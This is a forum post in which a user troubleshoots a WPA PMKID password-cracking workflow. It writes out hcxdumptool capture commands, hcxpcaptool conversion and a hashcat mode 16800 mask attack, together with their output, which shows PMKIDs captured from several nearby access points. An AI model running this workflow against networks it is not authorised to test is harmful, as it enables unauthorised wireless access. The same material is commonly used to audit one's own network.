09-26-2018, 09:50 PM
Am I doing this right?
Step 0: Device is in monitor mode:
Step 1: hcxdumptool:
This doesn't seem to work no matter how long it runs. But this does:
That only works if you run nmcli d connect wlp9s0 right before running hcxdumptool. But as you can see it does find a PMKID. It generates three test.pcapng files (test.pcapng, test.pcapng-0, test.pcapng-1). I've tried using all three files without any success.
Step 3: hcxpcaptool -z test.16800 test.pcapng
Step 4: hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
It's going wrong somewhere but I can't tell where.
Step 0: Device is in monitor mode:
Code:
$ iw dev
phy#0
Interface mon0
ifindex 9
wdev 0x3
addr my:v6:ip:addr
type monitor
txpower 0.00 dBm
Interface wlp9s0
ifindex 3
wdev 0x1
addr my:v6:ip:addr
ssid MyWifiStation
type managed
channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz
txpower 22.00 dBmStep 1: hcxdumptool:
Code:
$ hcxdumptool -o test.pcapng -i mon0 --enable_status=1
start capturing (stop with ctrl+c)
INTERFACE:...............: mon0
FILTERLIST...............: 0 entries
MAC CLIENT...............: l390234ko230 (client)
MAC ACCESS POINT.........: 460i32102l15 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63861
ANONCE...................: 3d95f1cfaa3c68be23f65966754ab537462e132abee5ec55f3882
INFO: cha=5, rx=1479, rx(dropped)=2, tx=4, powned=0, err=15This doesn't seem to work no matter how long it runs. But this does:
Code:
$ nmcli d connect wlp9s0
$ sudo hcxdumptool -o test.pcapng -i wlp9s0 --enable_status=1
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp2s0
FILTERLIST...............: 0 entries
MAC CLIENT...............: l390234ko230 (client)
MAC ACCESS POINT.........: 460i32102l15 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65136
ANONCE...................: dm102893jdy7192o0cmnf9938dc6a1dl10278ejcy16d6dk2028dkl1d
[16:06:07 - 001] e3kd09njf739 -> fcc233f999e3 [FOUND PMKID CLIENT-LESS]
[16:06:07 - 001] e3kd09njf739 -> 74c63be0c659 [FOUND PMKID]
[16:06:07 - 001] a0e4cb92b48f -> wew3dcdew329 [FOUND PMKID CLIENT-LESS]
[16:06:07 - 001] 74c63be0c659 -> e3kd09njf739 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 8539]
[16:06:08 - 001] e4186bb35776 -> d07714a05d13 [FOUND PMKID]That only works if you run nmcli d connect wlp9s0 right before running hcxdumptool. But as you can see it does find a PMKID. It generates three test.pcapng files (test.pcapng, test.pcapng-0, test.pcapng-1). I've tried using all three files without any success.
Step 3: hcxpcaptool -z test.16800 test.pcapng
Code:
192mf83df23fae35dj6cfa19dj72903j*20fkehi8ejfe*fmj3289urfe3*fjo3i13893u21jfi3723
1kf923j7fmad75eekd961denfy1823hj*fk038dj8ye9w*fj02po3jijid*fo2309ifjewo8ewyuroe
2j29d731j35862dfde923kj399d63bdr*ak0dk28eej09*e03j9j9df2e2*o390jfro2309d34243fjStep 4: hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Code:
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: test.16800
Time.Started.....: Wed Sep 24 14:12:30 2018 (25 hours, 8 mins)
Time.Estimated...: Thu Sep 25 15:20:07 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14467 H/s (24.94ms) @ Accel:1024 Loops:512 Thr:1 Vec:8
Recovered........: 0/3 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 617831552/617831552 (100.00%)
Rejected.........: 0/617831552 (0.00%)
Restore.Point....: 11881376/11881376 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:25-26 Iteration:0-1
Candidates.#1....: xpgjqxt! -> xqxvqxt!
Started: Mon Sep 24 14:12:30 2018
Stopped: Tue Sep 25 15:18:07 2018It's going wrong somewhere but I can't tell where.